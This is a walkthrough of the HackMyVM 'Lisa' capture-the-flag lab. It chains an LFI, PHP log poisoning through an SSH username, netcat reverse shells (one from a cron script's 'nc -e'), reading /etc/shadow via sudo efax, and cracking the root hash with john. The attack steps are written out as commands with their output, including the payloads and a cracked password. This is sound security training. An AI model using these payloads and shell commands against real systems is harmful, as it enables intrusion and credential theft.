HackMyVm Lisa Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Lisa
Scan ports.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 17:f7:58:02:e9:00:69:04:c5:88:ba:65:5a:11:dc:58 (RSA)
| 256 4c:32:c5:92:8c:d9:06:a4:a9:89:fa:99:92:bb:66:7f (ECDSA)
|_ 256 d1:36:d3:da:2b:7f:d7:03:5f:fc:1b:94:aa:7e:04:af (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelScan port 80, found nothing useful. Check index.html, notice the hint about domain name vinci.hmv.
~ curl http://192.168.56.100/index.html |tail -n 15
<p>
Please report bugs specific to modules (such as PHP and others)
to respective packages, not to the web server itself. contact: vinci.hmv
</p>
</div>Add vinci.hmv to /etc/hosts, scan port 80 again, still found nothing useful.
Use gobuster to enum vhosts.
~ gobuster vhost -u vinci.hmv -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -v |grep -v 10719
===============================================================
...
Missed: secret.vinci.hmv (Status: 200) [Size: 80]
===============================================================
2021/07/04 15:35:24 Finished
===============================================================Add secret.vinci.hmv to /etc/hosts, scan files again, found file.php.
~ gobuster dir -u http://secret.vinci.hmv -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medi
um.txt -x .html,.php,.txt,.zip,.bak,.php.bak -b 401,403,404,500 --wildcard -o 80_secret.log
===============================================================
/index.html (Status: 200) [Size: 80]
/file.php (Status: 200) [Size: 0]Wfuzz to get the param name.
~ wfuzz -u 'http://secret.vinci.hmv/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004959: 200 26 L 42 W 1441 Ch "command" Looks like a LFI.
~ curl 'http://secret.vinci.hmv/file.php?command=/etc/passwd' fish-0 | 0 [15:55:59]
root:x:0:0:root:/root:/bin/bash
...
leonardo:x:1000:1000:leonardo,,,:/home/leonardo:/bin/bash
...
See what files we can read.
~ wfuzz -u 'http://secret.vinci.hmv/file.php?command=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hh 0
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
...
000000188: 200 0 L 1 W 32032 Ch "/var/log/faillog"
000000173: 200 1364 L 16410 W 130186 Ch "/var/log/auth.log"
000000181: 200 2993 L 17879 W 202004 Ch "/var/log/dpkg.log"
000000220: 200 5 L 85 W 74873 Ch "/var/log/wtmp"
000000224: 200 0 L 1 W 1152 Ch "/var/run/utmp"
000000199: 200 0 L 1 W 292292 Ch "/var/log/lastlog"Because auth.log will save the username of ssh login. So we use a shell code as the ssh name.
~ ssh '<?php system($_GET[c]);?>'@192.168.56.100
<?php system($_GET[c]);?>@192.168.56.100's password:
Permission denied, please try again. Now we can run bash command.
~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=id'
...
Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups
=33(www-data)
from 192.168.56.150 port 33632 ssh2
...
Get reverse shell.
~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=nc%20192.168.56.150%201234%20-e%20/bi
n/bash'
=====================================================================
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:52344.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
There is only one user leonardo, and /opt/cron.sh belongs to him.
```
www-data@Lisa:/home/leonardo$ find / -user leonardo 2>/dev/null
find / -user leonardo 2>/dev/null
/home/leonardo
/home/leonardo/.bash_logout
/home/leonardo/.profile
/home/leonardo/.bashrc
/home/leonardo/.local
/home/leonardo/.local/share
/home/leonardo/.selected_editor
/home/leonardo/user.txt
/opt/cron.sh
Check the source code of cron.sh.
www-data@Lisa:/opt$ cat cron.sh
cat cron.sh
!/bin/bash
domain='shelly.lisa.hmv'
function check(){
timeout 1 bash -c "ping -c 1 $domain" > /dev/null 2>&1
if [ "$(echo $?)" == "0" ]; then
nohup nc -e /bin/sh $domain 65000
exit 0
elseifconfig
exit 1
fi }
Add the ip of attacker's machine to /etc/hosts.
www-data@Lisa:/opt$ ls -la /etc/hosts
ls -la /etc/hosts
-rw----rw- 1 root root 457 Jun 14 17:55 /etc/hosts
www-data@Lisa:/opt$ echo '192.168.56.150 shelly.lisa.hmv' > /etc/hosts
Wait a minute, we get reverse shell of user leonardo.
```
~ nc -nlvp 65000 curl-0 | 130 [16:15:34]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::65000
Ncat: Listening on 0.0.0.0:65000
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49036.
id
uid=1000(leonardo) gid=1000(leonardo) grupos=1000(leonardo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)Upload id_rsa.pub to /home/leonardo/.ssh/authorized_keys and chmod 600. Then we get ssh access.
~ ssh leonardo@192.168.56.100 fish-0 | 130 [16:20:35]
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux Lisa 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 14 13:01:44 2021 from 192.168.1.83
/usr/bin/xauth: file /home/leonardo/.Xauthority does not exist
leonardo@Lisa:~$Check sudo -l.
leonardo@Lisa:~$ sudo -l
sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
Matching Defaults entries for leonardo on Lisa:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User leonardo may run the following commands on Lisa:
(root) NOPASSWD: /usr/bin/efaxUse efax to read shadow file.
```
leonardo@Lisa:~$ sudo efax -d /etc/shadow
sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 10:17 compiled Dec 15 2016 12:12:26
efax: 10:17 opened /etc/shadow
efax: 10:17 Error: tcgetattr on fd=3 failed: Función ioctl no apropiada para el dispositivo
efax: 10:17 Warning: unexpected response "root:$6$RnHOYwKvoinsNFhF$zdIHAyW0TtHpAfnUc2p2bEPaHTuu/vdRFcTOSzOokSflUo/YoqDU3NzSCtm9VRELG53fGVrfen1PNBKGt6gix0:18792:0:99999:7:::"
efax: 10:17 Warning: unexpected response "daemon::18791:0:99999:7:::"
efax: 10:17 Warning: unexpected response "bin::18791:0:99999:7:::"
...
Use john to crack the password hash of root.
~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveme (root)
1g 0:00:00:00 DONE (2021-07-05 10:28) 6.666g/s 1706p/s 1706c/s 1706C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Get root at last.
leonardo@Lisa:~$ su root
Contraseña:
root@Lisa:~# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
Lisa